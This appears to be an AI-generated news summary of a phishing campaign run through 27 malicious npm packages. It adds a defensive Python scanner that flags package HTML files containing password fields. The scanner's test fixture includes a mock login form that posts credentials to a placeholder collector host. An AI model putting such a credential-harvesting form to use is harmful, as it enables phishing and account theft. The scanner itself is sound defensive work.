27 Malicious npm Packages Used as Phishing Infrastructure to Steal Login Credentials


These articles are AI-generated summaries. Please check the original sources for full details.

npm Packages as Phishing Infrastructure

Researchers have uncovered a sustained phishing campaign leveraging 27 malicious npm packages over a five-month period to steal login credentials from organizations in critical infrastructure sectors. The packages, uploaded by six different npm aliases, targeted sales and commercial personnel in the U.S. and allied nations.

Why This Matters

Modern software development relies heavily on package managers such as npm, which creates a large attack surface. The ideal trust model assumes every published package has integrity, but attackers exploit that assumption by injecting malicious code into seemingly legitimate packages. This campaign shows a sophisticated, long-running effort to repurpose a trusted distribution service for credential theft, which can cause significant financial and operational damage to targeted organizations; a successful attack can lead to data breaches, ransomware, and disruption of critical services.

Key Insights

  • Sustained Campaign: Attackers maintained malicious packages for five months, demonstrating persistence.
  • CDN Repurposing: Attackers leveraged npm’s CDN for resilient phishing page hosting, bypassing traditional takedown mechanisms.
  • Evilginx Overlap: Infrastructure overlaps with the Evilginx phishing kit, indicating a potentially skilled adversary.
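As an added example, not code from the summary or from the underlying research, here is a small defensive check that unpacks an npm package tarball in memory and flags HTML files carrying a password field, the kind of payload the CDN-repurposing insight describes. The package name, file contents and the collector URL in the sample tarball are constructed placeholders.

```python
import io
import json
import re
import tarfile

# Heuristics for an HTML file that looks like a credential-harvesting page:
# a password input, plus any absolute URL the enclosing form posts to.
PASSWORD_INPUT = re.compile(r'<input[^>]+type\s*=\s*["\']?password', re.I)
FORM_ACTION = re.compile(r'<form[^>]+action\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)


def scan_npm_tarball(tar_bytes: bytes) -> list[dict]:
    """Return one finding per HTML file in the tarball that contains a
    password field, with the absolute form-action URLs found in that file."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.lower().endswith((".html", ".htm")):
                continue
            html = tar.extractfile(member).read().decode("utf-8", errors="replace")
            if PASSWORD_INPUT.search(html):
                findings.append({"file": member.name, "post_targets": FORM_ACTION.findall(html)})
    return findings


def build_sample_tarball() -> bytes:
    """Constructed sample (not a real package): its only payload is a login page."""
    files = {
        "package/package.json": json.dumps({"name": "sample-pkg", "version": "1.0.0"}),
        "package/index.html": (
            '<form action="https://collector.example.invalid/submit" method="post">'
            '<input name="user"><input type="password" name="pass"></form>'
        ),
        "package/README.md": "# sample",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_npm_tarball(build_sample_tarball()):
        print(finding)
```

The same scan works on a tarball fetched with `npm pack`, and a package whose only content is a login page with an off-site form action is worth a manual look regardless of its download count.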

Practical Applications

  • Use Case: Manufacturing and healthcare organizations are targeted by attackers seeking access to sensitive business data and systems through compromised employee credentials.
  • Pitfall: Relying solely on package installation counts as a security indicator; malicious packages can remain undetected for extended periods despite low download numbers.
